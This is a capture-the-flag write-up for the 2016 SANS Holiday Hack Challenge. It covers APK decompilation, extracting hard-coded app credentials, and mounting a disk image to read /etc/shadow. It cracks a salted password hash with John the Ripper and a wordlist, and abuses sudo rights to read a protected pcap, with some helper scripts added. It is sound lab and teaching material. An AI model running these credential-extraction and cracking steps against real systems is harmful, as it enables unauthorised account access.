PEACEONEARTHJOYJOY.......]PEACEONEARTHJOYQQ[.......GOODWILLTOWARDSMENELFJOY
HOHOHOELFNORTHPOLE.......]PEACEONEARTHSANTAf.......NORTHPOLEHOHOHOHOHOHOELF
ELFSANTAELFHOHOHOQ.......]NORTHPOLEHOHOHOQQ[.......GOODWILLTOWARDSMENHOHOHO
CHRISTMASCHRISTMAS.......)PEACEONEARTHJOYQQ(.......HOHOHOHOHOHOSANTAWHOHOHO
SANTASANTAELFJOYQQ........HOHOHOCHRISTMASQ@.......:NORTHPOLEELFQWSANTASANTA
CHRISTMASCHRISTMAS;.......]PEACEONEARTHELF[.......<HOHOHOSANTANORTHPOLEQQWQ
HOHOHOPEACEONEARTH[........4HOHOHOJOYELFQf........]PEACEONEARTHHOHOHOHOHOHO
CHRISTMASCHRISTMASL........."HWJOYSANTAD^.........jNORTHPOLENORTHPOLEHOHOHO
GOODWILLTOWARDSMENm............"!???!"`...........NORTHPOLEHOHOHOWJOYQWELFQ
CHRISTMASJOYELFELFQ/.............................]WNORTHPOLECHRISTMASHOHOHO
SANTAJOYCHRISTMASQQk.............................dPEACEONEARTHELFELFHOHOHOQ
SANTAPEACEONEARTHJOY/...........................<NORTHPOLECHRISTMASHOHOHOQQ
ELFSANTASANTASANTAQQm...........................mJOYELFSANTAPEACEONEARTHELF
CHRISTMASCHRISTMASELFk.........................jGOODWILLTOWARDSMENQWJOYWELF
ELFJOYCHRISTMASJOYJOYQL.......................jNORTHPOLENORTHPOLEJOYJOYJOYQ
ELFELFJOYSANTAJOYELFELFg,..................._yGOODWILLTOWARDSMENQQWSANTAELF
PEACEONEARTHJOYELFQWSANTAc.................aQWCHRISTMASHOHOHOSANTAJOYHOHOHO
SANTAJOYJOYPEACEONEARTHELFQa,..........._wQWWHOHOHOSANTAJOYELFQQWJOYSANTAQQ
HOHOHOELFJOYPEACEONEARTHQQWJOYmwwaaaawyJOYWCHRISTMASHOHOHOPEACEONEARTHJOYWQ
ELFCHRISTMASSANTASANTASANTAJOYQQWWWWQWGOODWILLTOWARDSMENJOYELFQWCHRISTMASQQ
SANTAHOHOHOELFPEACEONEARTHGOODWILLTOWARDSMENJOYPEACEONEARTHSANTASANTAJOYWQQ
HOHOHOJOYELFJOYELFQWGOODWILLTOWARDSMENPEACEONEARTHGOODWILLTOWARDSMENELFELFQ
NORTHPOLEJOYJOYELFHOHOHOWPEACEONEARTHNORTHPOLECHRISTMASHOHOHOQWELFJOYQQWJOY
GOODWILLTOWARDSMENSANTAJOYNORTHPOLENORTHPOLEHOHOHOHOHOHOGOODWILLTOWARDSMENQ
CHRISTMASJOYSANTANORTHPOLEV?"-....................]GOODWILLTOWARDSMENQWJOYQ
GOODWILLTOWARDSMENSANTAW?`........................]GOODWILLTOWARDSMENSANTAQ
HOHOHOELFJOYJOYELFQWQQD'..........................]HOHOHONORTHPOLEQWHOHOHOQ
PEACEONEARTHHOHOHOJOYP`...........................]SANTAJOYELFWHOHOHOHOHOHO
PEACEONEARTHHOHOHOQQD`............................]JOYPEACEONEARTHSANTAELFQ
PEACEONEARTHHOHOHOQW'.............................]CHRISTMASJOYELFQWHOHOHOQ
ELFPEACEONEARTHELFQf..............................]PEACEONEARTHELFNORTHPOLE
SANTACHRISTMASJOYQQ`..............................]NORTHPOLEQQWNORTHPOLEQWQ
CHRISTMASHOHOHOELFE...............................]SANTAGOODWILLTOWARDSMENQ
GOODWILLTOWARDSMENf...............................]GOODWILLTOWARDSMENSANTAQ
ELFCHRISTMASELFJOY[.........amWNORTHPOLEGOODWILLTOWARDSMENJOYJOYJOYQWELFWQQ
PEACEONEARTHJOYJOY(......._QQWHOHOHOWJOYWPEACEONEARTHPEACEONEARTHNORTHPOLEQ
NORTHPOLEELFELFJOY`.......mSANTAQQWCHRISTMASQQWGOODWILLTOWARDSMENQQWHOHOHOQ
JOYSANTANORTHPOLEQ`......=CHRISTMASPEACEONEARTHSANTANORTHPOLENORTHPOLESANTA
NORTHPOLESANTAJOYQ.......]NORTHPOLEPEACEONEARTHELFHOHOHOGOODWILLTOWARDSMENQ
ELFNORTHPOLESANTAQ.......]GOODWILLTOWARDSMENQWELFJOYPEACEONEARTHCHRISTMASQQ
HOHOHONORTHPOLEJOY.......]GOODWILLTOWARDSMENJOYJOYQWPEACEONEARTHJOYWSANTAWQ
PEACEONEARTHJOYELF.......-QWSANTAELFWSANTAWHOHOHOPEACEONEARTHCHRISTMASELFQQ
CHRISTMASSANTAJOYQ........]SANTASANTASANTAGOODWILLTOWARDSMENPEACEONEARTHELF
ELFHOHOHOCHRISTMAS;........?ELFJOYPEACEONEARTHELFQWGOODWILLTOWARDSMENHOHOHO
GOODWILLTOWARDSMEN[.........-"????????????????????4ELFCHRISTMASHOHOHOQQWELF
SANTASANTAJOYSANTAL...............................]HOHOHOQWJOYELFQQWJOYJOYQ
NORTHPOLECHRISTMASQ...............................]NORTHPOLEELFQWJOYJOYELFQ
SANTANORTHPOLEELFQWc..............................]GOODWILLTOWARDSMENSANTAQ
JOYSANTACHRISTMASQQm..............................]ELFNORTHPOLECHRISTMASELF
CHRISTMASSANTASANTAQL.............................]PEACEONEARTHWJOYJOYQQWQQ
ELFNORTHPOLEHOHOHOJOYc............................]SANTACHRISTMASJOYELFJOYQ
SANTAELFHOHOHOJOYJOYQQc...........................]PEACEONEARTHSANTAQQWJOYQ
GOODWILLTOWARDSMENSANTAw,.........................]NORTHPOLEHOHOHONORTHPOLE
NORTHPOLENORTHPOLEQWSANTAa,.......................]PEACEONEARTHWSANTAWJOYQQ
SANTACHRISTMASHOHOHOELFELFQQgwaaaaaaaaaaaaaaaaaaaajCHRISTMASJOYPEACEONEARTH
SANTAHOHOHOPEACEONEARTHSANTAQWWWWWWWWWWWWWWWWWWWWHOHOHOELFJOYCHRISTMASELFQQ
NORTHPOLESANTASANTANORTHPOLESANTAPEACEONEARTHCHRISTMASELFHOHOHOELFJOYWJOYQQ
JOYELFJOYNORTHPOLEPEACEONEARTHJOYGOODWILLTOWARDSMENPEACEONEARTHELFELFELFELF
SANTAJOYCHRISTMASQQWELFWGOODWILLTOWARDSMENSANTANORTHPOLENORTHPOLEJOYWSANTAQ
JOYPEACEONEARTHSANTAGOODWILLTOWARDSMENJOYPEACEONEARTHJOYELFJOYCHRISTMASJOYQ
PEACEONEARTHJOYHOHOHOJOYHOHOHONORTHPOLEHOHOHOGOODWILLTOWARDSMENPEACEONEARTH
SANTASANTAELFJOYQQP???????????????????????????????4PEACEONEARTHJOYQWSANTAQQ
ELFELFHOHOHOHOHOHOf...............................]GOODWILLTOWARDSMENJOYELF
SANTAJOYELFELFELFQf...............................]CHRISTMASNORTHPOLESANTAQ
SANTAHOHOHOELFJOYQf...............................]GOODWILLTOWARDSMENELFELF
GOODWILLTOWARDSMENf...............................]CHRISTMASCHRISTMASJOYQWQ
[ASCII-art output omitted: a large block of text built from the words SANTA, ELF, JOY, HOHOHO, CHRISTMAS, NORTHPOLE, PEACEONEARTH and GOODWILLTOWARDSMEN, in which the shape of the rendered image gives the answer]
Based on the output above, the answer to this question is BUG BOUNTY.
2. What is inside the ZIP file distributed by Santa’s team?
The next question in this part of the challenge says we need to find out what is in the ZIP file distributed by Santa’s team.
Looked on Santa’s Twitter account and it looks like there isn’t anything of use for this question.
On Santa’s Instagram, however, there is a picture of a very messy desk that has some books, a laptop, trash, etc. You will see in the image that there is a printout of an nmap scan partly covered by the Violent Python book on the desk. Below is the hostname that they were scanning.
Decided to do a basic Nmap scan of the site and found that the ssh, http, and https ports are open. If you go to the site in a web browser, it will show you an image of Santa’s business card. Doesn’t look like there is any data needed there, considering I already have the business card.
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-10 01:18 CDT
Nmap scan report for www.northpolewonderland.com (130.211.124.143)
Host is up (0.032s latency).
rDNS record for 130.211.124.143: 143.124.211.130.bc.googleusercontent.com
Not shown: 997 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https
Nmap done: 1 IP address (1 host up) scanned in 5.41 seconds
When I looked back at the picture on Santa’s Instagram, there is a little piece of data on the computer screen in the picture. It looks like the name of a file named SantaGram_v4.2.zip. Looks like that is the ZIP file that they were talking about in the question. So, I downloaded the file with wget.
wget http://www.northpolewonderland.com/SantaGram_v4.2.zip
--2020-07-10 01:20:40-- http://www.northpolewonderland.com/SantaGram_v4.2.zip
Resolving www.northpolewonderland.com (www.northpolewonderland.com)... 130.211.124.143
Connecting to www.northpolewonderland.com (www.northpolewonderland.com)|130.211.124.143|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1963026 (1.9M) [application/zip]
Saving to: ‘SantaGram_v4.2.zip’
SantaGram_v4.2.zip 100%[=============================================================>] 1.87M 2.16MB/s in 0.9s
2020-07-10 01:20:41 (2.16 MB/s) - ‘SantaGram_v4.2.zip’ saved [1963026/1963026]
Decided to view the contents of the ZIP file with vim. Looks like I have the answer to the question asking what is inside it. There is an APK file named SantaGram_4.2.apk.
" zip.vim version v30
" Browsing zipfile /home/n3s0/SantaGram_v4.2.zip
" Select a file with cursor and press ENTER

SantaGram_4.2.apk
However, this ZIP file is password protected. I attempted to get in with an empty password and some other generic passwords before I decided to look at the previous question, remembering that the two somehow complement each other. I attempted to enter BUG BOUNTY multiple ways before I finally got it right.
The password for the ZIP file is bugbounty. After entering the password, the APK file inside could be extracted from the ZIP file.
unzip SantaGram_v4.2.zip
Archive: SantaGram_v4.2.zip
[SantaGram_v4.2.zip] SantaGram_4.2.apk password:
inflating: SantaGram_4.2.apk
The answer to question two is SantaGram_4.2.apk. Looks like it is time to enter the portal in the animated game. Looks like it leads me to the North Pole.
Part 2 - Awesome Package Konveyance
The two siblings were dazed as they materialized in a snow-covered glade. “W-w-where are we?” Josh shivered.
“Given all the snow and the elves roaming about, I’d say there’s a good chance we’re at the North Pole itself,” Jessica replied.
Thinking through what had just happened, Josh had a realization. “So that’s how Santa transports all those holiday packages on Christmas! He carries that bag around the world and then reaches inside to pull presents directly from the North Pole. Ingenious!”
Jessica added, “And, that’s not all… it looks like Santa is really big into social networking! Not only does he use Twitter and Instagram, it seems that he and the elves use their own homegrown social networking platform called SantaGram. They seem to share information about vulnerabilities they find in software as part of bug bounty programs. Why, they’ve even set up their own bug-finding program.”
“Wow!” Josh responded, “That’s really cool. Let’s take a close look at that SantaGram mobile application. It might help us find out who kidnapped Santa.”
Again, Dear Reader, you are called upon to help the children in their analysis as you answer the following questions. If you get stuck, feel free to explore the North Pole and interact with Santa’s friendly and helpful elves, who are available to give you hints.
Before starting the solutions…
To start out with this challenge, I used apktool to disassemble SantaGram_4.2.apk.
In the writeup it looks like I used SilverSearch to look through this data. But I don’t think I will this time. Too lazy to install new software.
apktool d SantaGram_4.2.apk
WARNING: cgroup v2 is not fully supported yet, proceeding with partial confinement
I: Using Apktool 2.1.1 on SantaGram_4.2.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: /home/n3s0/apktool/framework/1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Baksmaling classes.dex...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...
This will disassemble the Java in the APK file into a directory named SantaGram_4.2, which consists of a bunch of PNG, XML, and SMALI files. This will be like finding a needle in a haystack. But, that’s okay. The find and grep commands can be used for this.
3. What username and password are embedded in the APK file?
Answering this question is simple. Search through the directory SantaGram_4.2 recursively to find the data needed. In this case it’s a username and password.
Used both find and grep to search all files in the directory for the string password and had it output the file path that it found the pattern in.
find . -exec grep -H "password" {} \;
There are two options here. There is the file b.smali and there is SplashScreen.smali. Both files contain the string password. Looks like both files have the data needed to answer the question.
[snipped]
./smali/com/northpolewonderland/santagram/b.smali: const-string v1, "password"
./smali/com/northpolewonderland/santagram/SignUp$1.smali: iget-object v0, v0, Lcom/northpolewonderland/santagram/SignUp;->passwordTxt:Landroid/widget/EditText;
./smali/com/northpolewonderland/santagram/SignUp$1.smali: iget-object v1, v1, Lcom/northpolewonderland/santagram/SignUp;->passwordTxt:Landroid/widget/EditText;
./smali/com/northpolewonderland/santagram/SplashScreen.smali: const-string v1, "password"
[snipped]
The excerpt below shows the username and password embedded in plain text at lines 264 and 270.
262 const-string v1, "username"
263
264 const-string v2, "guest"
265
266 invoke-virtual {v0, v1, v2}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
267
268 const-string v1, "password"
269
270 const-string v2, "busyreindeer78"
271
These are the username and password found in the APK file. Perhaps this would be a good time to note that you shouldn’t embed credentials in your code?
- Username: guest
- Password: busyreindeer78
Note: Now that I’m looking at the AndroidManifest.xml file, this could have been found by following android:name="com.northpolewonderland.santagram.SplashScreen" within the manifest. If your brain is good at connecting the dots, this can be achieved by knowing that the smali directory contains all of the disassembled code and that each dot in the class name marks its place within the directory tree. Then you open up SplashScreen.smali and search for it. The data will be there. May not be elegant. But, it gets the job done in a different way.
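The find/grep step above can be turned into a small audit script. This is an added example, not code from the writeup or from SantaGram: it walks apktool output and flags a const-string "username"/"password" key that is immediately followed by another string literal, which is exactly the JSONObject.put() pattern seen in SplashScreen.smali. The smali snippet inside it is a constructed stand-in modelled on the excerpt above.

```python
"""Flag string literals in apktool smali output that look like embedded credentials.

Added example (not from the original writeup). Heuristic: in smali, a call such as
JSONObject.put("password", "busyreindeer78") compiles to two consecutive
const-string instructions, the key and then the value, so pairing a sensitive
key with the very next literal in the same method surfaces hard-coded secrets.
"""
import re
from pathlib import Path

# const-string vN, "literal"   (also const-string/jumbo); literal may contain escapes
CONST_STRING = re.compile(r'^\s*const-string(?:/jumbo)?\s+[vp]\d+,\s*"((?:[^"\\]|\\.)*)"')
# Keys whose following literal is worth reporting; extend as needed.
SENSITIVE_KEYS = {"username", "password", "passwd", "secret", "token", "api_key"}


def find_hardcoded_credentials(smali_text):
    """Return [(key, value)] for each sensitive key followed by a literal in one method."""
    findings = []
    pending_key = None
    for line in smali_text.splitlines():
        if line.strip().startswith(".end method"):
            pending_key = None  # never pair a key with a literal from another method
            continue
        m = CONST_STRING.match(line)
        if not m:
            continue
        literal = m.group(1)
        if pending_key is not None:
            findings.append((pending_key, literal))
            pending_key = None
        elif literal.lower() in SENSITIVE_KEYS:
            pending_key = literal.lower()
    return findings


def scan_smali_tree(root):
    """Walk an apktool output directory and report findings keyed by file path."""
    report = {}
    for path in Path(root).rglob("*.smali"):
        hits = find_hardcoded_credentials(path.read_text(errors="replace"))
        if hits:
            report[str(path)] = hits
    return report


# Constructed sample, modelled on the SplashScreen.smali excerpt in the writeup.
SAMPLE_SMALI = """\
.method private buildReport()Lorg/json/JSONObject;
    new-instance v0, Lorg/json/JSONObject;
    const-string v1, "username"
    const-string v2, "guest"
    invoke-virtual {v0, v1, v2}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
    const-string v1, "password"
    const-string v2, "busyreindeer78"
    invoke-virtual {v0, v1, v2}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
    const-string v1, "activity"
    const-string v2, "Me"
    return-object v0
.end method
"""

if __name__ == "__main__":
    # Run against the sample; point scan_smali_tree("SantaGram_4.2") at real apktool output.
    for key, value in find_hardcoded_credentials(SAMPLE_SMALI):
        print(f"{key}: {value}")
```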
Other Ways?
Yes, there is another way to do this with tools like Burp Suite. If you install the APK file in an emulator or Android device and poke around a bit after setting it up so traffic passes through the tool, you get a little more information. For instance, the application sends a request to the host analytics.northpolewonderland.com with the credentials every so often. You can see the data pasted from Burp Suite below: the raw output of a POST request from the device.
Request to https://analytics.northpolewonderland.com:443 [104.198.252.157]
POST /report.php?type=usage HTTP/1.1
Content-Type: application/json
User-Agent: Delvik/1.6.0 (Linux; U; Android 4.4.2; Tab2A7-20F Build/KOT49H)
Host: analytics.northpolewonderland.com
Connection: close
Accept-Encoding: gzip
Content-Length: 105
{"username":"guest","udid":"a4f0fd77e07442a9","type":"usage","password":"busyreindeer78","activity":"Me"}
The answer to the question can be found below.
- Username: guest
- Password: busyreindeer78
4. What is the name of the audible component (audio file) in the SantaGram APK file?
I used a similar approach to the previous question to answer this one. But, I just searched for anything with *.mp3 in the name. The output isn’t too exciting. But, it gets the job done and answers the question.
find . -name "*.mp3"
./res/raw/discombobulatedaudio1.mp3
The answer to this question is: discombobulatedaudio1.mp3
There are multiple of these. So I stashed it. Played it with mplayer and it startled the shit out of me. Mostly because my volume was all the way up.
Part 3 - Fresh Baked Holiday Pi
Jessica was perplexed. “That audio inside of the SantaGram application sounds really strange. I wonder what it means.”
The children quickly realized that they could only get so far in their analysis of SantaGram using the phones they had brought with them to the North Pole. Jessica summarized their situation, “Gosh, I wish I had brought my laptop with me. Without it, we’re not going to be able to dissect that application. And, time is of the essence. We need to find and rescue Santa so he can continue to deliver presents, or else Christmas is sunk this year.”
Josh replied, “And, making matters worse, I’ve noticed that some of the doors here at the North Pole have little computer terminals next to them. If we want to open those doors, we’re going to need a machine to interface with those terminals.”
Just then, Jessica noticed something curious and positively useful. “Heeeey! It looks like someone has left piece parts of a computer system called a ‘Cranberry Pi’ strewn all about the North Pole. Perhaps we can fetch all of those pieces and put together a computer we can then use to open those terminals and work on the SantaGram application!”
Josh was excited again. “I’ll bet that with a fully operational Cranberry Pi, we’ll be able to find Santa Claus and save Christmas!”
Now, Dear Reader, scurry around the North Pole and retrieve all of the computer parts to build yourself a Cranberry Pi. Once your Pi is fully operational, please help the Dosis children find and rescue Santa, answering the following questions:
5. What is the password for the “cranpi” account on the Cranberry Pi system?
The challenge initiated when I downloaded the cranbian-jessie.img file after my discussion with Holly Evergreen in the North Pole. In order to put the Cranberry Pi together, I need a password. I downloaded the Cranbian image file and started searching for the password.
Luckily I have the image from back when I did this challenge. So I can go through some password cracking. For starters, I unzip the Cranbian image file from the zip file.
unzip cranbian.img.zip
Archive: cranbian.img.zip
inflating: cranbian-jessie.img
This will extract the cranbian-jessie.img file from the zip archive. Now it’s time to investigate the image file. I remember looking at this when I was in college doing it and thought, “You can really mount img files?” Yes, you can, littler me. That’s basically the process for this.
I check the partitions of the img file and see what the file system looks like using fdisk. Needed to check the sector size, which was 512 bytes, and needed to look for the second partition, which starts at sector 137216.
fdisk -l cranbian-jessie.img
Disk cranbian-jessie.img: 1.29 GiB, 1389363200 bytes, 2713600 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x5a7089a1
Device Boot Start End Sectors Size Id Type
cranbian-jessie.img1 8192 137215 129024 63M c W95 FAT32 (LBA)
cranbian-jessie.img2 137216 2713599 2576384 1.2G 83 Linux
Using the mount(1) command, I mount the second partition of the cranbian-jessie.img file to the /mnt directory. I make sure I can see all of the output available for troubleshooting purposes by using the verbose (-v) flag. Using the -o flag with the offset option, I utilize the arithmetic expression $((512*137216)). This gives the exact byte offset of the sector where that partition starts.
The rest of this command is pretty self-explanatory. But, I will do it anyway. Utilizing the -t flag I specify the filesystem that I want to mount it as, ext4, and then the img file I want to mount and where I want to mount it.
Not quite sure why I felt the need to explain all of this. But, I explained it then. Quite frankly it’s not going to make sense to everyone. I provided the man page number for that specific purpose.
sudo mount -v -o offset=$((512*137216)) -t ext4 cranbian-jessie.img /mnt
mount: /mnt does not contain SELinux labels.
You just mounted a file system that supports labels which does not
contain labels, onto an SELinux box. It is likely that confined
applications will generate AVC messages and not be allowed access to
this file system. For more details see restorecon(8) and mount(8).
mount: /dev/loop7 mounted on /mnt.
From the looks of it, the file system mounted as expected. Now it’s time to search for that password.
ls /mnt/
bin boot dev etc home lib lost+found media mnt opt proc root run sbin srv sys tmp usr var
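The offset arithmetic above is easy to get wrong on an image with a different layout, so here is an added example (not from the writeup) that reads the sector size and partition table out of fdisk -l output and builds the same mount command. The fdisk text it parses is a constructed copy of the output shown above.

```python
"""Derive the mount(8) offset for a raw disk image from `fdisk -l` output.

Added example, not part of the original writeup: it automates the manual
$((512*137216)) step by parsing the sector size and the partition table, and
picks the partition by MBR type id rather than by position.
"""
import re

# Constructed copy of the fdisk -l output shown in the writeup.
SAMPLE_FDISK = """\
Disk cranbian-jessie.img: 1.29 GiB, 1389363200 bytes, 2713600 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x5a7089a1

Device               Boot Start     End Sectors  Size Id Type
cranbian-jessie.img1       8192  137215  129024   63M  c W95 FAT32 (LBA)
cranbian-jessie.img2     137216 2713599 2576384  1.2G 83 Linux
"""

UNITS_RE = re.compile(r"^Units: sectors of \d+ \* (\d+) = (\d+) bytes", re.M)
# device, optional '*' boot flag, start, end, sectors, size, id, type
PART_RE = re.compile(
    r"^(\S+)\s+(\*\s+)?(\d+)\s+(\d+)\s+(\d+)\s+(\S+)\s+([0-9a-fA-F]{1,2})\s+(.+?)\s*$", re.M
)


def parse_fdisk(text):
    """Return (sector_size_in_bytes, [partition dicts]) from fdisk -l text."""
    m = UNITS_RE.search(text)
    if not m:
        raise ValueError("could not find sector size in fdisk output")
    sector_size = int(m.group(2))
    parts = []
    for pm in PART_RE.finditer(text):
        parts.append({
            "device": pm.group(1),
            "boot": pm.group(2) is not None,
            "start": int(pm.group(3)),
            "end": int(pm.group(4)),
            "sectors": int(pm.group(5)),
            "id": pm.group(7).lower(),
            "type": pm.group(8),
        })
    return sector_size, parts


def mount_offset(text, partition_id="83"):
    """Byte offset of the first partition with the given MBR type id.

    0x83 is the plain Linux partition, the one holding /etc/shadow in the
    Cranbian image; the FAT32 boot partition (id c) is skipped.
    """
    sector_size, parts = parse_fdisk(text)
    for p in parts:
        if p["id"] == partition_id.lower():
            return p["start"] * sector_size
    raise LookupError(f"no partition with id {partition_id}")


def mount_command(image, text, mountpoint="/mnt", fstype="ext4"):
    """Build the same mount(8) invocation the writeup uses, offset filled in."""
    return (f"sudo mount -v -o offset={mount_offset(text)} -t {fstype} "
            f"{image} {mountpoint}")


if __name__ == "__main__":
    # Feed real output with: fdisk -l cranbian-jessie.img | python3 this_script.py
    print(mount_command("cranbian-jessie.img", SAMPLE_FDISK))
```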
Decided to check and see if the cranpi user was in the /etc/passwd file in the image. Looks like it’s indeed in there. Its password is located in the /etc/shadow file, which is indicated by the x within the output.
grep cranpi etc/passwd
cranpi:x:1000:1000:,,,:/home/cranpi:/bin/bash
Below is the output for the /etc/shadow file. This contains the password hash for the user, which I will be using John the Ripper to crack after I combine the two files together. This shows that it uses SHA-512, as indicated by the $6$ within the output. Looks like the hash is also salted with a random string. But, this shouldn’t be too much of an issue.
sudo grep cranpi etc/shadow
cranpi:$6$2AXLbEoG$zZlWSwrUSD02cm8ncL6pmaYY/39DUai3OGfnBbDNjtx2G99qKbhnidxinanEhahBINm/2YyjFihxg7tgc343b0:17140:0:99999:7:::
Needed to use the unshadow command so it would take the passwd file and the shadow file and combine them into one file. This will hold all of the user information containing the usernames and their hashes. These hashes are what I’ll be focusing on cracking using a wordlist.
sudo unshadow etc/passwd etc/shadow > ~/ctf/shhc/2016/passwords.txt
Output below shows all of the user data that’s contained in the passwords.txt text file. This is all I’ll be focusing on for this challenge.
grep cranpi ~/ctf/shhc/2016/passwords.txt
cranpi:$6$2AXLbEoG$zZlWSwrUSD02cm8ncL6pmaYY/39DUai3OGfnBbDNjtx2G99qKbhnidxinanEhahBINm/2YyjFihxg7tgc343b0:1000:1000:,,,:/home/cranpi:/bin/bash
Below is the command used to crack the password. Which in this case only took about 15 to 20 minutes with a dictionary attack. I utilized the rockyou.txt wordlist to crack the password. This is a pretty popular wordlist that contains a list of words, leaked passwords, etc., so it can be used for cracking new ones. If a user’s password is in this wordlist, it can be cracked with a little variation. Looks like john loaded one hash for cracking and autodetected it as either crypt or generic crypt(3).
john --users=1000 --wordlist=~/ctf/shhc/2016/Q5/rockyou.txt --salts=1 --shell=/bin/bash ~/ctf/shhc/2016/passwords.txt
Loaded 1 password hash (crypt, generic crypt(3) [?/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:08:29 1% 0g/s 504.6p/s 504.6c/s 504.6C/s yoyo21..yellowsun
0g 0:00:14:39 2% 0g/s 499.5p/s 499.5c/s 499.5C/s HURLEY..Gilmore1
1g 0:00:15:09 100% 0.001099g/s 499.7p/s 499.7c/s 499.7C/s yvette10..yuki01
yummycookies (cranpi)
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Once the session is completed, it shows the cracked password as yummycookies. This is the password for the cranpi account. Which is also the accepted answer for this challenge.
- Password for cranpi account: yummycookies
6. How did you open each terminal door and where had the villain imprisoned Santa?
From the sounds of it, this challenge requires that I go through each terminal and explain how I did it. Now that I’ve cracked the password, I should be able to open up the Cranberry Pis. These are little boxes spread out throughout the North Pole that contain little challenges to solve. I will be using this question to go through all of them and demonstrate that they’re complete.
Just note that the original challenge isn’t available. So, I’m going to go off of images that I have available to me. Not all of the data will be complete. But, I will explain everything as best I can.
6.1 Peacoats and PCAPs: Tcpdump Challenge
Below is the challenge output:
*************************************************************************************
* *
* To open the door, find both parts of the passphrase inside of the /out.pcap file. *
* *
*************************************************************************************
For this challenge I had to figure out how to read the file. The scratchy user account didn’t have the appropriate permission to read the pcap file. Needed to figure out which users were on this system and which ones could potentially have access to the pcap file.
Decided to check the /etc/passwd file. Just to see what I could find. Looks like there is a user by the name of itchy on here. Which may turn out to be fruitful.
scratchy@5c38c4bcd72f:/$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
....
itchy:x:1000:1000::/home/itchy:/bin/sh
scratchy:x:1001:1001:/home/scratchy:/bin/sh
Looks like the itchy username and group both own the file. There are no SUID permissions setup. Going to need to see if I can find another way.
ls -l out.pcap
total 1
-r-------- 1 itchy itchy 1087929 Dec 2 15:05 out.pcap
I remember with this I utilized the -l flag for sudo(1) to do something. Just couldn’t remember what. I checked the man page for sudo and the flag allows you to list the commands that a particular user can use. Just depends on what’s configured.
Looks like in this case scratchy should be able to use the tcpdump(1) command with no issue. This is as long as they’re running the command as itchy. You should know where I’m going with this.
scratchy@5c38c4bcd72f:/$ sudo -l
sudo: unable to resolve host 5c38c4bcd72f
Matching Defaults entries for scratchy on 5c38c4bcd72f:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User scratchy may run the following commands on 5c38c4bcd72f:
(itchy) NOPASSWD: /usr/sbin/tcpdump
(itchy) NOPASSWD: /usr/bin/strings
Decided to test that by opening the pcap file with tcpdump as itchy. Once I confirmed that works, I make sure to take a look at the actual pcap file. Turns out part of a POST request was sent using a form. This has the value of santasli. Which just may be the beginning portion of the password.
sudo -u itchy tcpdump -qns 0 -A -r out.pcap
<head></head>
<body>
<form>
<input type="hidden" name="part1" value="santasli" />
</form>
</body>
</html>
Need to find the second part of the password. Based on the output from the sudo -l command, there is another command that can be used as itchy. I attempted to use the strings(1) command as is. But, I couldn’t see the appropriate output. Then I decided to start playing with the character encoding to see what I could find.
Looks like the output that I needed could be found by using the 16-bit little-endian encoding for the text. This outputs part two of this password: ttlehelper.
sudo -u itchy strings -e l out.pcap
part2:ttlehelper
The passcode to the door is santaslittlehelper. With that, I can finally open the door. Where there is a little elf that hints you can use Burp Suite to send requests using Repeater and send it to the curl(1) command.
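To show why the default strings run missed part2 while strings -e l found it, here is an added example (not from the writeup) that implements both scans over a constructed byte buffer: a plain ASCII form field like the one tcpdump printed, followed by text stored as 16-bit little-endian. It also handles the case where the UTF-16 text starts on an odd byte offset.

```python
"""Extract 16-bit little-endian strings the way `strings -e l` does.

Added example, not from the original writeup. GNU strings with its default
encoding only reports runs of single-byte printable characters, so ASCII text
stored as UTF-16LE (each character followed by a 0x00 byte) never shows up.
strings_utf16le() looks for that byte pattern directly, at both alignments.
"""
import string

PRINTABLE = set(string.ascii_letters + string.digits + string.punctuation + " \t")


def strings_utf16le(data, min_len=4):
    """Return [(offset, text)] for printable runs encoded as UTF-16LE."""
    found = []
    for start in (0, 1):  # the text need not begin on an even offset
        run, run_off, i = [], None, start
        while i + 1 < len(data):
            lo, hi = data[i], data[i + 1]
            if hi == 0 and chr(lo) in PRINTABLE:  # ASCII char + NUL = one UTF-16LE unit
                if not run:
                    run_off = i
                run.append(chr(lo))
            else:
                if len(run) >= min_len:
                    found.append((run_off, "".join(run)))
                run = []
            i += 2
        if len(run) >= min_len:
            found.append((run_off, "".join(run)))
    return sorted(found)


def strings_ascii(data, min_len=4):
    """Plain single-byte scan, equivalent to `strings` with no -e option."""
    found, run, run_off = [], [], None
    for i, b in enumerate(data):
        if chr(b) in PRINTABLE:
            if not run:
                run_off = i
            run.append(chr(b))
        else:
            if len(run) >= min_len:
                found.append((run_off, "".join(run)))
            run = []
    if len(run) >= min_len:
        found.append((run_off, "".join(run)))
    return found


# Constructed stand-in for a slice of out.pcap: binary noise, an ASCII form
# field like the one tcpdump showed, then the second half of the passphrase
# stored as UTF-16LE, which the default single-byte scan cannot see.
SAMPLE = (
    b"\x00\x01\x02\xff"
    + b'name="part1" value="santasli"'
    + b"\x00\xff\x10"
    + "part2:ttlehelper".encode("utf-16-le")
    + b"\x00\x00\x7f"
)

if __name__ == "__main__":
    print("strings       :", [s for _, s in strings_ascii(SAMPLE)])
    print("strings -e l  :", [s for _, s in strings_utf16le(SAMPLE)])
```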
6.2 The One Who Knocks: Doormat Challenge
This challenge was a fun one. It took a little trial and error. But, I got it. I used the find command in the current directory to show the entire directory tree. The key_for_the_door.txt file was hidden within a directory structure of objects that had no names, had spaces, and special characters.
